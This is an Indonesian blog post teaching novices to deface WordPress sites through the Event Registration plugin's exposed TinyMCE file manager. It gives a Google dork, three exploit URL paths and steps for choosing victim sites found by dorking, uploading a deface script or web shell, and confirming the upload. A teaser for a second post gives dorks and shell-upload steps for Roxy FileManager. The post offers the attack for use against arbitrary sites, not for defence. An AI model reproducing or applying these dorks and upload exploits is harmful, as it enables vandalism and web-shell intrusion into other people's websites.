Skip to main content

Deface metode WP Event Registration File Upload

Kali ini Mimin Bakal Memberikan tutorial Deface Lagi. Oke dari pada berlama-lama, langsung saja ke tutorialnya.

Dork:

inurl:/wp-content/plugins/event-registration/jscripts/tiny_mce
*Kembangin Dork Bila Perlu

Exploit:

Exploit 1 => /wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/frameset.php?a=b&js=mcFileManager.insertFileToForm&initial_path=mce_clear&initial_rootpath=mce_clear&remember=true

Exploit 2 => /wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/upload.php?path=/home/[DIRECTORY-NAME-HERE]/public_html/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/files

Exploit 3 => /wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/frameset.php?a=b&js=mcFileManager.insertFileToForm&url=/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/Select%20file&initial_path=mce_clear&initial_rootpath=mce_clear&remember=true

Langkah Pertama
Langka Pertama Kita Dorking Dulu Di Google Menggunakan Dork Diatas.

Langka Kedua
Langka selanjutnya, Pilih Salah Satu Web Yang Ingin Di-Deface.

Langka Ketiga
Setelah Masuk Ke Web Yang Ingin Kita Deface, Saat nya Masukkan Exploit Di belakang URL Web target Kalian, Pilih Salah Satu Exploit Diatas, Disini Saya Menggunakan Exploit Nomor 1.
Note:*Tidak Semua Web Bisa Menggunakan Exploit Nomor1, Kalian Bisa mencoba satu persatu exploit diatas.

Langkah Ke-Empat
Jika sudah memasukkan Exploit tadi, Maka Tampilannya Kurang lebih seperti ini, Tampilannya sepeeti File Manager!
Langkah Ke-Lima
Klik Ikon Yang ditunjuk pada Pada Gambar Tersebut, Maka Kalian Akan Dibawah Ke Halaman File Upload, Tampilannya Kurang lebih Seperti Ini.
Sihlakan Upload Script Deface Kalian, Upload Shell Juga Bisa Tapi Itu Semua tergantung dari webnya dan juga keberuntungan Kalian saja😊.
Langkah Ke-Enam
Setelah Berhasil Mengupload Script Deface maupun Shell Yang kalian Uploas Tadi, Kalian akan dibawa kembali ke Halaman File Manager nya kembali.
Untuk Mengecek File Kalian Sudah Ter-upload atau tidaknya, kalian bisa patch nya dengan cara menambahkan /wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/files/ dibelakang web target kalian. Sehingga menjadi seperti Ini:
https://target.com/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/files/

Dan Booummm....
Ok sekian dulu tutorial kali ini, semoga bermanfaat Buat Para Defacer Awam😊
Baca Juga: DEFACE METODE ROXY FILEMANAGER
*Mohon Maaf Jika Ada salah Pengetikan pada Artikel Kali ini.
Sekian dulu yah,Trimakasih❤️
Labels:

Comments

Post a Comment

Popular posts from this blog

Deface Metode Responsive Filemanager

Deface Metode Responsive Filemanager Sesuai dengan judulnya kali ini Mimin Bakal Share Tutorialnya kali ini.
Baca Lebih Lanjut »

Deface Metode Roxy FileManager

Deface metode Roxy FileManager - sebenernya teknik ini sudah cukup lama, dan mungkin untuk para defacer lama juga tau dan bisa melakukan nya. Tapi disini saya sengaja membuat artikel Supaya Para defacer Awam Juga dapat belajar Untuk Teknik Yang satu ini. Dari pada berlama-lama langsung saja simak tutorial nya dibawah ini. Pertama Dorking di google menggunakan dork dibawah ini. inurl:/ckeditor/fileman/index.html intitle:"Roxy file manager" inurl:/fileman/index.html inurl:/ckeditor/fileman/ Pilih saja salah satu dork diatas, kemudian dorking di google. Baca Juga:  DEFACE METODE PRO TAXI Kedua Pilih salah satu websitenya, kemudian buka website. Tampilannya kira-kira seperti ini. Upload shell maupun script deface kalian. Catatan: Tidak Semua Web Bisa Di Upload Shell, Tergantung Dari Keberuntungan Kalian:v Ketiga  Gambar dibawah contoh jika kalian sukses meng-upload shell maupun Script Deface Kalian. Untuk Path file nya Kalian Cukup Tambahin " /Uploads/d...
Post a Comment
Baca Lebih Lanjut »